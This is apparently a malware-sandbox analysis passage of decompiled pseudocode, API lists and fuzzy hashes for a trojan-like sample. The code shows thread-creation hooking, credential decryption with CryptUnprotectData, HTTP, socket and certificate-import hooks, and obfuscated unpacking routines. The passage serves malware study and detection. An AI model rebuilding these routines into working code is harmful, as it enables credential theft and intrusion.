        				_t40 = _a16;
        				if(_t21 != 0 && NtQueryInformationProcess(_t40, 0,  &_v28, 0x18,  &_v32) >= 0 && _v40 != 0 && (_v28 == 0 || E0041277B(_t32, _v28) == 0)) {
        					_t34 = E00406946(_t35, _t38, _v28);
        					_t51 = _t34;
        					if(_t34 != 0) {
        						_t27 = E00406A38(_t35, _t40, _t42, _t51, _t34, 0);
        						if(_t27 != 0) {
        							_t30 = _t27 -  *0x41e5a4 + E00407132;
        							if(( *0x41e590 & 0x00000010) != 0) {
        								_t30 = _t30 ^  *(_a24 + 0xb0);
        							}
        							 *(_a24 + 0xb0) = _t30;
        						}
        						CloseHandle(_t34);
        					}
        				}
        				return NtCreateThread(_a4, _a8, _a12, _t40, _a20, _a24, _a28, _a32);
        			}

        APIs
          • Part of subcall function 00406B23: WaitForSingleObject.KERNEL32(00000000,00409585,000002E8,00000000,000002E8,2C7DCEF4,00000002), ref: 00406B2B
        • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 0040E92A
        • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040E991
          • Part of subcall function 0041277B: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00412788
          • Part of subcall function 0041277B: Thread32First.KERNEL32 ref: 004127A3
          • Part of subcall function 0041277B: CloseHandle.KERNEL32(00000000), ref: 004127C4
        • NtCreateThread.NTDLL(?,?,?,?,?,?,?,?), ref: 0040E9AD
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CloseCreateHandle$FirstInformationObjectProcessQuerySingleSnapshotThreadThread32Toolhelp32Wait
        • String ID:
        • API String ID: 3154080929-0
        • Opcode ID: 89d60d981338ede8ca1a61e3567d9ed833a2c22dd8fc82e8d5e6e9b103f922c7
        • Instruction ID: f9aa09d5b9dcb29411145294671f95b3bc18cd638af679679804d5dd09476ce7
        • Opcode Fuzzy Hash: 89d60d981338ede8ca1a61e3567d9ed833a2c22dd8fc82e8d5e6e9b103f922c7
        • Instruction Fuzzy Hash: 47119071100245ABDB119F96CC45FAB3FA9BB48308F04493ABE44A51E1D739D821DB59
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • socket.WS2_32(00000000,00000002,00000011), ref: 00414409
        • bind.WS2_32(00000000,00000017,-0000001D), ref: 00414429
        • closesocket.WS2_32(00000000), ref: 00414434
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: bindclosesocketsocket
        • String ID:
        • API String ID: 1873677229-0
        • Opcode ID: aa0f011803f6f40e92c779f580d8bed4f27866cf00897806415d85c7d6183982
        • Instruction ID: 5ab3e6cf6f5729b3ed38296d900faf262f6a2c7fa94670ef67fcaca4f47b1c02
        • Opcode Fuzzy Hash: aa0f011803f6f40e92c779f580d8bed4f27866cf00897806415d85c7d6183982
        • Instruction Fuzzy Hash: 50E04F7220051166E6202B3EAD8EF7F35A99BC5B71F584729F9B1D21F1EB7888C2D134
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 72%
        			E00409D29(void* __eax, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
        				char _v5;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				intOrPtr _v20;
        				intOrPtr _v24;
        				intOrPtr _v28;
        				intOrPtr _v32;
        				intOrPtr _v36;
        				intOrPtr _v44;
        				signed int _v48;
        				void* _v52;
        				char _v56;
        				char _v72;
        				void* _v96;
        				char _v196;
        				void* __ebx;
        				void* __esi;
        				intOrPtr _t48;
        				intOrPtr _t50;
        				intOrPtr _t52;
        				intOrPtr _t54;
        				signed int _t65;
        				void* _t66;
        				void* _t68;
        				char* _t70;
        				intOrPtr _t77;
        				signed int* _t82;
        				intOrPtr _t95;
        				void* _t97;
        				signed int _t100;
        				void* _t107;
        				void* _t109;
        				intOrPtr _t115;
        				char* _t117;
        				void* _t129;
        
        				_t121 = __eflags;
        				_t115 = _a4;
        				_push(_t115);
        				_t92 = __eax;
        				_t48 = E00409CD6(__eax, __eflags, 0x4c);
        				_push(_t115);
        				_v20 = _t48;
        				_t50 = E00409CD6(_t92, _t121, 0x4f);
        				_push(_t115);
        				_v24 = _t50;
        				_t52 = E00409CD6(_t92, _t121, 0x50);
        				_push(_t115);
        				_v28 = _t52;
        				_t54 = E00409CD6(_t92, _t121, 0x4d);
        				_push(_t115);
        				_v36 = _t54;
        				_v12 = E00409CD6(_t92, _t121, 0x4e);
        				_v5 = _v20 != 0;
        				if(_v5 != 0) {
        					_t95 = _v12;
        					_t65 = E00411C55(_t95);
        					if(_t95 != 0 && _t65 > 1) {
        						_t100 = _t65 & 0x80000001;
        						if(_t100 < 0) {
        							_t129 = (_t100 - 0x00000001 | 0xfffffffe) + 1;
        						}
        						if(_t129 == 0) {
        							asm("cdq");
        							_v48 = _t65 - _t107 >> 1;
        							_t77 = E004110D6(_t65 - _t107 >> 1);
        							_v44 = _t77;
        							if(_t77 != 0) {
        								if(E00411943(_v12, _t77) != 0) {
        									_t82 =  &_v48;
        									__imp__CryptUnprotectData(_t82, 0, _a8, 0, 0, 0,  &_v56);
        									if(_t82 == 1) {
        										_v16 = E004114C2(_v52);
        										LocalFree(_v52);
        									}
        								}
        								E00411106(_v44);
        							}
        						}
        					}
        					_t66 = 0x4b;
        					E0040CA33(_t66,  &_v196);
        					_t117 =  &_v72;
        					_t68 = 0x54;
        					E0040CA33(_t68, _t117);
        					_t70 = 0x40310c;
        					_t109 =  ==  ? 0x40310c : _v16;
        					_t97 =  ==  ? 0x40310c : _v36;
        					_t135 = _v32;
        					if(_v32 != 0) {
        						_t70 = _t117;
        					}
        					_push(_t109);
        					_push(_t97);
        					_push(_t70);
        					_push(_v20);
        					E00411E87(_a12, E00411C55( *_a12),  *_a12, _t135,  &_v196, _a4);
        					_t56 = E00411106(_v16);
        				}
        				E004174B5(E004174B5(E004174B5(E004174B5(E004174B5(_t56, _v20), _v24), _v28), _v36), _v12);
        				return _v5;
        			}

        APIs
        • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000000,?), ref: 00409E20
        • LocalFree.KERNEL32(?,?,?,?), ref: 00409E3C
          • Part of subcall function 00411106: HeapFree.KERNEL32(00000000,00000000,004128FD,00000000,?,?,?,0040628D,00000000,0040675B), ref: 00411119
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Free$CryptDataHeapLocalUnprotect
        • String ID:
        • API String ID: 2231100991-0
        • Opcode ID: 3dbca34cf350b6e17f968eb0edcb66274745a5cab3c52f77b29df391b092c930
        • Instruction ID: dc3d5c506dba8bf9e8af29a0913f48728844c3b9e113be30aa0cb1b6caece7bf
        • Opcode Fuzzy Hash: 3dbca34cf350b6e17f968eb0edcb66274745a5cab3c52f77b29df391b092c930
        • Instruction Fuzzy Hash: 21514C71E04119AADF10EFB6CC559EEBBB5EF04314F10443AF615B72A2D6394D81CB98
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • select.WS2_32(00000000,?,00000000,00000000,00000001), ref: 0041409A
        • recv.WS2_32(?,?,00000000,00000000), ref: 004140B2
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: recvselect
        • String ID:
        • API String ID: 741273618-0
        • Opcode ID: 5baeb40a0d6eb7d9f9e2157ccabcb97fe6db50f5d332ecf06f798576f51dd92f
        • Instruction ID: 65f473436dd6eb499de961e2c173246bb2d2b2272c757328f5ee8324b6685a8b
        • Opcode Fuzzy Hash: 5baeb40a0d6eb7d9f9e2157ccabcb97fe6db50f5d332ecf06f798576f51dd92f
        • Instruction Fuzzy Hash: C9F0C872C101246BC7189F25CC449DE7FADDF46320F108366B55AE11E4D6744AC4CF94
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00411208() {
        				struct _FILETIME _v12;
        				struct _SYSTEMTIME _v28;
        
        				GetSystemTime( &_v28);
        				SystemTimeToFileTime( &_v28,  &_v12);
        				return E00411266( &_v12);
        			}

        APIs
        • GetSystemTime.KERNEL32(?,?,?,0041058F,00000000,000000FF,00000000), ref: 00411212
        • SystemTimeToFileTime.KERNEL32(?,000000FF,?,?,0041058F,00000000,000000FF,00000000), ref: 00411220
          • Part of subcall function 00411266: __aulldiv.LIBCMT ref: 0041127F
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Time$System$File__aulldiv
        • String ID:
        • API String ID: 1459046340-0
        • Opcode ID: 0bb5171bf70a4730eb29518b68652d8b5fcc8c0c08b155dc10e7d7a35b7fce9f
        • Instruction ID: b63f5312fb8886f298130c068196ad6a19dbdb04f5f100225eec53df67e842ac
        • Opcode Fuzzy Hash: 0bb5171bf70a4730eb29518b68652d8b5fcc8c0c08b155dc10e7d7a35b7fce9f
        • Instruction Fuzzy Hash: BFD09E7580010FABCF00EBE4D95ACDEBB7CAA04308F404565A601E21A1EA34A2869B94
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 63%
        			E0040A448() {
        				signed int _v5;
        				void* _v12;
        				signed short* _v16;
        				char _v20;
        				void* _v24;
        				void* _v28;
        				void* _v32;
        				char _v36;
        				char _v40;
        				char _v56;
        				void* _v260;
        				char _v356;
        				char _v460;
        				void* __edi;
        				void* __esi;
        				char* _t52;
        				void* _t53;
        				void* _t55;
        				void* _t65;
        				intOrPtr* _t67;
        				intOrPtr* _t69;
        				intOrPtr* _t71;
        				intOrPtr* _t73;
        				intOrPtr* _t75;
        				intOrPtr* _t77;
        				intOrPtr* _t79;
        				intOrPtr* _t84;
        				intOrPtr* _t86;
        				void* _t87;
        				signed short* _t88;
        				intOrPtr _t96;
        				signed int _t113;
        				intOrPtr* _t117;
        				char* _t119;
        				char* _t121;
        
        				_t52 =  &_v32;
        				_v32 = 0;
        				__imp__CoCreateInstance(0x401558, 0, 0x4401, 0x401538, _t52);
        				if(_t52 != 0) {
        					L3:
        					_v16 = 0;
        					_t117 = 0;
        					L4:
        					if(_t117 == 0) {
        						return _t52;
        					}
        					_t53 = 0x39;
        					E0040CA33(_t53,  &_v56);
        					_t121 =  &_v40;
        					_t55 = 0x3a;
        					E0040CA33(_t55, _t121);
        					_push(_t121);
        					_push( &_v56);
        					_push(_t117);
        					_v20 = 0;
        					if( *((intOrPtr*)( *_t117 + 0xc))() != 0) {
        						L31:
        						 *((intOrPtr*)( *_t117 + 8))(_t117);
        						_push(0xcc);
        						return E004095BC(_t114, _v20, 0x38);
        					}
        					_push( &_v12);
        					_push(_t117);
        					if( *((intOrPtr*)( *_t117 + 0x20))() != 0) {
        						goto L31;
        					}
        					_t65 = 0x3b;
        					E0040CA33(_t65,  &_v356);
        					_t67 = _v12;
        					 *((intOrPtr*)( *_t67 + 0xc))(_t67);
        					_t69 = _v12;
        					_push(_t69);
        					if( *((intOrPtr*)( *_t69 + 0x10))() != 0) {
        						L30:
        						_t71 = _v12;
        						 *((intOrPtr*)( *_t71 + 8))(_t71);
        						goto L31;
        					}
        					_t96 = 0x64;
        					do {
        						_t73 = _v12;
        						_t114 =  &_v28;
        						_push( &_v28);
        						_push(_t73);
        						if( *((intOrPtr*)( *_t73 + 0x14))() != 0) {
        							goto L28;
        						}
        						_t77 = _v28;
        						_t114 =  &_v24;
        						_push( &_v24);
        						_push(0x401548);
        						_push(_t77);
        						if( *((intOrPtr*)( *_t77))() != 0) {
        							L27:
        							_t79 = _v28;
        							 *((intOrPtr*)( *_t79 + 8))(_t79);
        							goto L28;
        						}
        						_v5 = 1;
        						while(1) {
        							_push(_v5 & 0x000000ff);
        							_push( &_v356);
        							_t114 = 0x34;
        							_t119 =  &_v460;
        							if(E00411DF9( &_v356, _t114, _t119) <= 0) {
        								break;
        							}
        							_t86 = _v24;
        							_t114 = _t119;
        							_v36 = _t96;
        							_t87 =  *((intOrPtr*)( *_t86 + 0xc))(_t86, _t119, 0,  &_v260, _t96,  &_v36);
        							if(_t87 != 0) {
        								if(_t87 == 0x7a || _t87 == 1) {
        									L25:
        									_v5 = _v5 + 1;
        									if(_v5 <= _t96) {
        										continue;
        									}
        								}
        								break;
        							}
        							_t88 =  &_v260;
        							if(_v260 == 0) {
        								L18:
        								if( *_t88 != 0x40) {
        									_t88 = 0;
        								}
        								L20:
        								if(_t88 != 0 && E004114FA( &_v260 | 0xffffffff,  &_v20,  &_v260) != 0) {
        									E004114FA(1,  &_v20, 0x4031a0);
        								}
        								goto L25;
        							}
        							_t113 = _v260 & 0x0000ffff;
        							while(_t113 != 0x40) {
        								_t88 =  &(_t88[1]);
        								_t113 =  *_t88 & 0x0000ffff;
        								if(_t113 != 0) {
        									continue;
        								}
        								goto L18;
        							}
        							goto L20;
        						}
        						_t84 = _v24;
        						 *((intOrPtr*)( *_t84 + 8))(_t84);
        						goto L27;
        						L28:
        						_t75 = _v12;
        						_push(_t75);
        					} while ( *((intOrPtr*)( *_t75 + 0x10))() == 0);
        					_t117 = _v16;
        					goto L30;
        				}
        				_t117 = _v32;
        				if(_t117 == 0) {
        					goto L3;
        				} else {
        					_v16 = _t117;
        					goto L4;
        				}
        			}

        APIs
        • CoCreateInstance.OLE32(00401558,00000000,00004401,00401538,?,?,00000000), ref: 0040A46D
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CreateInstance
        • String ID:
        • API String ID: 542301482-0
        • Opcode ID: 7301934b5e479e3bc81d1dcf83ae20aa2bcdfb6ba2ad5813d983fa8bb5d5dacf
        • Instruction ID: 91f3e1c1c6097437d95edf20dfdbb960c579318d36708e1dcc780f0d5acc0e9c
        • Opcode Fuzzy Hash: 7301934b5e479e3bc81d1dcf83ae20aa2bcdfb6ba2ad5813d983fa8bb5d5dacf
        • Instruction Fuzzy Hash: A0515D71A00309ABDB14DBA5CC84AAFB778BF48714F1444AAE502FB290D779EE42CB55
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 82%
        			E004078CA() {
        				void* _t23;
        				void* _t27;
        				void* _t29;
        				void* _t31;
        
        				_t29 = _t31 - 0x78;
        				_t27 = 0;
        				 *(_t29 - 0xa4) = 0x11c;
        				if(GetVersionExW(_t29 - 0xa4) == 0) {
        					L25:
        					return _t27;
        				}
        				_t23 = 2;
        				if( *((intOrPtr*)(_t29 - 0x94)) != _t23) {
        					goto L25;
        				}
        				if( *((intOrPtr*)(_t29 + 0x76)) != 1) {
        					if( *((intOrPtr*)(_t29 + 0x76)) == _t23 ||  *((char*)(_t29 + 0x76)) == 3) {
        						if( *((intOrPtr*)(_t29 - 0xa0)) != 5) {
        							if( *((intOrPtr*)(_t29 - 0xa0)) != 6) {
        								goto L25;
        							}
        							if( *((intOrPtr*)(_t29 - 0x9c)) != _t27) {
        								if( *((intOrPtr*)(_t29 - 0x9c)) != 1) {
        									goto L25;
        								}
        								_push(7);
        								L24:
        								_pop(_t27);
        								goto L25;
        							}
        							_push(5);
        							goto L24;
        						}
        						if( *((intOrPtr*)(_t29 - 0x9c)) != _t23) {
        							goto L25;
        						}
        						_push(3);
        						goto L24;
        					} else {
        						goto L25;
        					}
        				}
        				if( *((intOrPtr*)(_t29 - 0xa0)) != 5) {
        					if( *((intOrPtr*)(_t29 - 0xa0)) != 6) {
        						goto L25;
        					}
        					if( *((intOrPtr*)(_t29 - 0x9c)) != 0) {
        						if( *((intOrPtr*)(_t29 - 0x9c)) != 1) {
        							goto L25;
        						}
        						_push(6);
        						goto L24;
        					}
        					_push(4);
        					goto L24;
        				} else {
        					if( *((intOrPtr*)(_t29 - 0x9c)) != 0) {
        						if( *((intOrPtr*)(_t29 - 0x9c)) == 1 ||  *((intOrPtr*)(_t29 - 0x9c)) == _t23) {
        							_t27 = _t23;
        						}
        					} else {
        						_t27 = 1;
        					}
        					goto L25;
        				}
        			}

        APIs
        • GetVersionExW.KERNEL32(?,74B04EE0), ref: 004078E9
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Version
        • String ID:
        • API String ID: 1889659487-0
        • Opcode ID: bb1a81f7342768f687b0b0b82f29e4a1bc482dc97bc03e119f805794b6ed64f3
        • Instruction ID: 471da307a433b334e6a8a6fac0338afc201cf11daa044c0fe1f6a5a5692a7f9e
        • Opcode Fuzzy Hash: bb1a81f7342768f687b0b0b82f29e4a1bc482dc97bc03e119f805794b6ed64f3
        • Instruction Fuzzy Hash: 682118B0D5C329CAFF308A688C01BAA76649B12716F0051FFD54AB12C2D2782AC4CF5B
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00411230() {
        				long _t7;
        				signed int _t8;
        				intOrPtr _t9;
        				void* _t11;
        				void* _t13;
        
        				_t11 = _t13 - 0x78;
        				_t7 = GetTimeZoneInformation(_t11 - 0x34);
        				if(_t7 != 1) {
        					if(_t7 != 2) {
        						_t8 = 0;
        					} else {
        						_t9 =  *((intOrPtr*)(_t11 + 0x74));
        						goto L4;
        					}
        				} else {
        					_t9 =  *((intOrPtr*)(_t11 + 0x20));
        					L4:
        					_t8 = (_t9 +  *(_t11 - 0x34)) * 0xffffffc4;
        				}
        				return _t8;
        			}

        APIs
        • GetTimeZoneInformation.KERNEL32(?), ref: 0041123F
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: InformationTimeZone
        • String ID:
        • API String ID: 565725191-0
        • Opcode ID: 09fcd8e40e31890f13ce203173545b96c56f290b75b689b4eeefc61c2ff40cf3
        • Instruction ID: 06d1411a830d89164962127044dfd91d78c7ef6e52445d39d680722943cc58f3
        • Opcode Fuzzy Hash: 09fcd8e40e31890f13ce203173545b96c56f290b75b689b4eeefc61c2ff40cf3
        • Instruction Fuzzy Hash: 51E086315440088BDB20EBA4DE85CDD77E6AB51304F300452F642F6160D238D9858607
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 66%
        			E0040ED74() {
        				void* __ebx;
        				intOrPtr _t1;
        				intOrPtr _t2;
        				signed int _t53;
        				void* _t55;
        				void* _t56;
        
        				_t1 =  *0x41e5b4;
        				if(_t1 == 0) {
        					_t1 =  *0x41e5b0;
        					 *0x41e024 = E0040E904;
        				} else {
        					 *0x41e024 = E0040E9BB;
        				}
        				 *0x41e020 = _t1;
        				_t2 =  *0x41e5c0; // 0x77e27840
        				 *0x41e030 = _t2;
        				 *0x41e040 = GetFileAttributesExW;
        				 *0x41e050 = HttpSendRequestW;
        				 *0x41e060 = HttpSendRequestA;
        				 *0x41e070 = HttpSendRequestExW;
        				 *0x41e080 = HttpSendRequestExA;
        				 *0x41e090 = InternetCloseHandle;
        				 *0x41e0a0 = InternetReadFile;
        				 *0x41e0b0 = __imp__InternetReadFileExA;
        				 *0x41e0c0 = InternetQueryDataAvailable;
        				 *0x41e0d0 = HttpQueryInfoA;
        				 *0x41e0e0 = __imp__#3;
        				 *0x41e0f0 = __imp__#19;
        				 *0x41e100 = __imp__WSASend;
        				 *0x41e110 = OpenInputDesktop;
        				 *0x41e120 = SwitchDesktop;
        				 *0x41e130 = DefWindowProcW;
        				 *0x41e140 = DefWindowProcA;
        				 *0x41e150 = DefDlgProcW;
        				 *0x41e160 = DefDlgProcA;
        				 *0x41e170 = DefFrameProcW;
        				 *0x41e180 = DefFrameProcA;
        				 *0x41e190 = DefMDIChildProcW;
        				 *0x41e1a0 = DefMDIChildProcA;
        				 *0x41e1b0 = CallWindowProcW;
        				 *0x41e1c0 = CallWindowProcA;
        				 *0x41e1d0 = RegisterClassW;
        				 *0x41e1e0 = RegisterClassA;
        				 *0x41e1f0 = RegisterClassExW;
        				 *0x41e200 = RegisterClassExA;
        				 *0x41e210 = BeginPaint;
        				 *0x41e220 = EndPaint;
        				 *0x41e230 = GetDCEx;
        				 *0x41e240 = GetDC;
        				 *0x41e250 = GetWindowDC;
        				 *0x41e260 = ReleaseDC;
        				 *0x41e270 = GetUpdateRect;
        				 *0x41e280 = GetUpdateRgn;
        				 *0x41e290 = GetMessagePos;
        				 *0x41e2a0 = GetCursorPos;
        				 *0x41e2b0 = SetCursorPos;
        				 *0x41e2c0 = SetCapture;
        				 *0x41e2d0 = ReleaseCapture;
        				 *0x41e2e0 = GetCapture;
        				 *0x41e2f0 = GetMessageW;
        				 *0x41e300 = GetMessageA;
        				 *0x41e310 = PeekMessageW;
        				_push(0x41e020);
        				 *0x41e320 = PeekMessageA;
        				_t53 = 0x32;
        				 *0x41e330 = __imp__PFXImportCertStore;
        				return E0040ECE3(_t53, _t55, _t56);
        			}

        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: AllocVirtual
        • String ID: @xw
        • API String ID: 4275171209-2821512424
        • Opcode ID: 8cd4c89e1d4a7062916963e9c196d80a2e1ebd930319657cea5a3a70e9770776
        • Instruction ID: 640cc757fa93cb85b2af48e3c922d0b76feae3825dd99dd490422aec469a6a36
        • Opcode Fuzzy Hash: 8cd4c89e1d4a7062916963e9c196d80a2e1ebd930319657cea5a3a70e9770776
        • Instruction Fuzzy Hash: CB61BCBCA00215DFE380CF6AEA90A807BE5B30D7443448A7AED58E3771E374A8459B0D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 81%
        			E0245B0E3(signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr* _a24, intOrPtr _a28, intOrPtr _a32) {
        				intOrPtr _v8;
        				signed int _v16;
        				signed int _v20;
        				signed int _v24;
        				intOrPtr _t42;
        				signed int _t45;
        				signed int _t59;
        				signed int _t61;
        				intOrPtr* _t80;
        
        				_v8 =  *((intOrPtr*)( *((intOrPtr*)(_a32 + 0x190))));
        				asm("adc ebx, eax");
        				_v16 = _a8 ^ 0x15692923;
        				if((_a4 ^ 0xf26341d4) + 0x24398beb != _a20 || _v16 != 0) {
        					asm("adc ebx, eax");
        					_v16 = _a8 ^ 0x15692923;
        					if( *_a24 != (_a4 ^ 0xf26341d4) + 0x24398beb || 0 != _v16) {
        						_t80 = _a24;
        						_t42 = E0245AC60( *_t80, _v8, _a28, _a32);
        						 *_t80 = _t42;
        						return _t42;
        					} else {
        						asm("adc ebx, eax");
        						_v24 = _a8 ^ 0x15692923;
        						_v20 = _a12;
        						_v20 = _v20 ^ 0xf26341d4;
        						_v16 = _a16;
        						_v16 = _v16 ^ 0x15692923;
        						_a12 = _v20 + 0x24398beb;
        						_t59 = _v16;
        						asm("adc ebx, eax");
        						_a16 = _t59;
        						if((_a4 ^ 0xf26341d4) + 0x24398beb != _a12 || _v24 != _t59) {
        							_t61 = _a8 ^ 0x15692923;
        							asm("adc ebx, eax");
        							if(_v8 != (_a4 ^ 0xf26341d4) + 0x24398beb || 0 != _t61) {
        								 *0xdf065d8e =  *0xdf065d8e + 0x5e60548e;
        								return 0;
        							} else {
        								 *0xa4201ae =  *0xa4201ae & 0x6b60138f;
        								return 0;
        							}
        						} else {
        							_t45 =  *0x4e604cae * 0xae70035f;
        							 *0x4e604cae = _t45;
        							return _t45;
        						}
        					}
        				} else {
        					 *0xda53738f =  *0xda53738f | 0x1b6212be;
        					return 0x2568237a;
        				}
        			}

        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
        • Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp
        Similarity
        • API ID:
        • String ID: z#h%
        • API String ID: 0-4193079989
        • Opcode ID: fb0d810867c324c2d9e8b002b858946fdb03724e809642219420884dff85fbea
        • Instruction ID: 09ae7fa8b0c5bf500fc1d78cdc3a078b5fbebad46e0f0ee43e2b6311e67bc3b0
        • Opcode Fuzzy Hash: fb0d810867c324c2d9e8b002b858946fdb03724e809642219420884dff85fbea
        • Instruction Fuzzy Hash: 31415276A00329DFCB41CF99C8C05AEB7B2FF88298B55806AD954A7301D770A951CF90
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 85%
        			E024413C7(signed int __ecx, void* __edx) {
        				signed int _v5;
        				char _v6;
        				char _v7;
        				char _v8;
        				char _v9;
        				short _v16;
        				intOrPtr _v20;
        				signed int _v24;
        				signed int _v28;
        				unsigned int _v32;
        				void* _v36;
        				signed int _v40;
        				signed int _v44;
        				signed int* _v48;
        				signed short* _v52;
        				intOrPtr* _v56;
        				void* _v60;
        				signed int _v64;
        				signed int _v68;
        				intOrPtr* _v72;
        				signed int _v76;
        				signed int _v80;
        				signed int _v84;
        				intOrPtr _t169;
        				intOrPtr _t172;
        				intOrPtr* _t173;
        				signed int* _t180;
        				signed int _t182;
        				signed int _t185;
        				signed int _t206;
        				intOrPtr _t218;
        				signed int _t225;
        				signed int _t240;
        				void* _t243;
        				signed int _t264;
        				intOrPtr _t281;
        				intOrPtr _t289;
        				intOrPtr _t290;
        				intOrPtr _t309;
        				signed int _t333;
        				intOrPtr _t336;
        				intOrPtr _t349;
        				signed int _t361;
        				void* _t364;
        				void* _t375;
        				signed int _t378;
        				intOrPtr _t383;
        				signed int _t394;
        				signed int _t397;
        				signed int _t399;
        				intOrPtr _t400;
        				signed int _t404;
        				signed int _t406;
        				intOrPtr* _t407;
        				signed int _t411;
        
        				_t169 =  *0x24491a0; // 0x2449028
        				_t1 = _t169 + 0x198; // 0x2449428
        				 *0x2449851 =  *0x2449851 | 0x02449845;
        				 *( *_t1) =  *( *_t1) & 0x00000000;
        				_t172 =  *0x24491a0; // 0x2449028
        				 *0x2449749 =  *0x2449749 + 0x2449791;
        				_t2 = _t172 + 0x198; // 0x2449428
        				_t173 =  *_t2;
        				 *0x244980d = 0x1e9e;
        				if( *_t173 != 0) {
        					return _t173;
        				} else {
        					_v28 = 0xc6f8e435;
        					_v68 = 0xc6f8e409;
        					_v48 =  &_v44;
        					asm("adc dword [0x24497c1], 0x6982");
        					 *0x24497b9 =  !( *0x24497b9);
        					_v72 =  &_v40;
        					_v60 =  &_v36;
        					_v7 = 0xfc;
        					 *0x24497c1 =  ~( *0x24497c1);
        					_v9 = 0xdc;
        					_t229 = __ecx &  *0x2449745;
        					_t406 = 0x26ceac77;
        					_push(_t178);
        					while(1) {
        						L2:
        						_v24 = 0x1000;
        						do {
        							L3:
        							asm("sbb [0x24497cd], edx");
        							_v40 = (_v28 ^ 0x2a823c2b) + 0x138527e2;
        							 *_v48 = 0xc6f9e435;
        							 *0x2449801 =  *0x2449801 - 0x5020;
        							 *0x244974d =  *0x244974d ^ 0x02449861;
        							asm("sbb edx, [0x2449849]");
        							 *0x2449751 =  *0x2449751 & 0x000000ff;
        							_v44 = ( *_v48 ^ 0x2a823c2b) + 0x138527e2;
        							_v32 = 0;
        							_t180 =  *0x2449881; // 0x2449855
        							 *0x2449741 =  *0x2449741 &  *_t180;
        							_t240 =  *_v72;
        							_t182 =  *0x2449795; // 0xff4dd7d5
        							 *0x2449785 =  *0x2449785 & _t182;
        							_v64 = _t240;
        							 *0x2449851 =  *0x2449851 - _t240;
        							 *0x2449861 =  *0x2449861 ^ _t182;
        							_v84 = 0xc6f8e434;
        							_t178 = _v44;
        							 *0x2449815 =  *0x2449815 ^ 0x024497bd;
        							_t243 = (_v28 ^ 0x2a823c2b) + 0x138527e2;
        							_t375 = (_v28 ^ 0x2a823c2b) + 0x138527e2;
        							 *0x2449809 = 0x36f6;
        							 *0x244973d = 0x920;
        							if(_t243 >= _t178) {
        								L10:
        								_v32 = 0xc6f8e405;
        								 *0x2449755 = 0x742a;
        								while(1) {
        									 *0x2449859 =  *0x2449859 - 0x2449779;
        									 *0x24497d1 =  *0x24497d1 ^ 0x00006830;
        									 *0x2449851 = 0x77fe;
        									if((_v32 ^ 0x2a823c2b) + 0x138527e2 == 0) {
        										break;
        									}
        									asm("adc dword [0x244984d], 0x44c1");
        									 *0x2449739 =  *0x2449739 ^ 0x00001b88;
        									 *0x2449861 =  *0x2449861 - 0x2449859;
        									_v20 = (_v32 ^ 0x2a823c2b) + 0x138527e2;
        									 *0x2449795 =  *0x2449795 | _t406;
        									_v64 = 0xc6f8e40c;
        									_v80 = 0xc6f8e40e;
        									_v84 = 0xc6f8e409;
        									_t378 =  *0x24497f9; // 0x8b744035
        									 *0x2449815 =  *0x2449815 & _t378;
        									 *0x2449809 =  *0x2449809 & 0x00004e71;
        									 *0x2449841 = 0x3472;
        									if(_v20 != (_v64 ^ 0x2a823c2b) + 0x138527e2) {
        										asm("adc ecx, [0x244973d]");
        										 *0x2449809 =  *0x2449809 - 0x6779;
